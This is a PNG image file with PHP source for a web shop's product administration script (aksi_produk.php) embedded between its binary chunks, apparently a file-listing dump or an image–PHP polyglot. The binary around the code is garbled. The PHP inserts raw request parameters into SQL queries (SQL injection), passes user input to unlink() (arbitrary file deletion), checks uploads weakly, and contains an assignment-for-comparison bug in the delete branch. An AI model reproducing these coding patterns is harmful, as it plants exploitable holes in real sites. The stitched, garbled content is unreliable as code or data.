php IHDR w Q )Ba pHYs sRGB gAMA a IDATxMk\U s&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨ G;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j- $_q?qS XzG'ay
files >> /var/www/html/fl/content/produk/ |
files >> /var/www/html/fl/content/produk/aksi_produk.php |
<?php session_start(); //error_reporting(0); if (empty($_SESSION['namauser']) AND empty($_SESSION['passuser'])){ header('location:../../lockscreen.php'); } else{ include "../../konfig/koneksi.php"; include "../../konfig/fungsi_thumb.php"; include "../../konfig/library.php"; $module=$_GET['module']; $act=$_GET['act']; // Input user if ($module=='produk' AND $act=='input'){ $acak = rand(1,99); $lokasi_file = $_FILES['fupload']['tmp_name']; $tipe_file = $_FILES['fupload']['type']; $nama_file = $_FILES['fupload']['name']; $nama_file_unik = $acak.$nama_file; if(cext($lokasi_file) == 0){ $_SESSION['log']="invalid-file"; header('location:tambah-produk'); exit(); } else{ if ($_FILES["fupload"]["error"] > 0 OR empty($lokasi_file)){ $nama_file_unik = ""; } else{ UploadProduk($nama_file_unik); } mysql_query("INSERT INTO fbc_produk (id_brand, nama, kode, detail, harga, het,harga_modal, no_urut, catatan, foto, status) VALUES ('$_POST[id_brand]', '$_POST[nama]', '$_POST[kode]', '$_POST[detail]', '$_POST[harga]', '$_POST[het]','$_POST[harga_modal]', '$_POST[no_urut]', '$_POST[catatan]', '$nama_file_unik', 'hidden')"); header('location:produk'); } } elseif ($module=='produk' AND $act=='update'){ $acak = rand(1,99); $lokasi_file = $_FILES['fupload']['tmp_name']; $tipe_file = $_FILES['fupload']['type']; $nama_file = $_FILES['fupload']['name']; $nama_file_unik = $acak.$nama_file; if ($_FILES["fupload"]["error"] > 0 OR empty($lokasi_file)){ $nama_file_unik = "$_POST[foto]"; } else{ UploadProduk($nama_file_unik); unlink("../../images/img_produk/$_POST[foto]"); } mysql_query("UPDATE fbc_produk SET id_brand='$_POST[id_brand]', nama='$_POST[nama]', kode='$_POST[kode]', detail='$_POST[detail]', harga='$_POST[harga]', het='$_POST[het]',harga_modal='$_POST[harga_modal]', no_urut='$_POST[no_urut]', catatan='$_POST[catatan]', foto='$nama_file_unik', status='$_POST[status]' WHERE id_db='$_POST[id_produk]'"); header('location:produk'); } elseif($module=='produk' AND $act='delete'){ $d=mysql_fetch_array(mysql_query("SELECT * FROM fbc_produk WHERE id_db='$_GET[id]'")); unlink("../../images/img_produk/$d[foto]"); mysql_query("DELETE FROM fbc_produk WHERE id_db='$_GET[id]'"); header('location:produk'); } } ?>y~or5J={Eeu磝Qk ᯘG{?+]ן?wM3X^歌>{7پK>on\jy Rg/=fOroNVv~Y+ NGuÝHWyw[eQʨSb> >}Gmx[o[<{Ϯ_qFvM IENDB`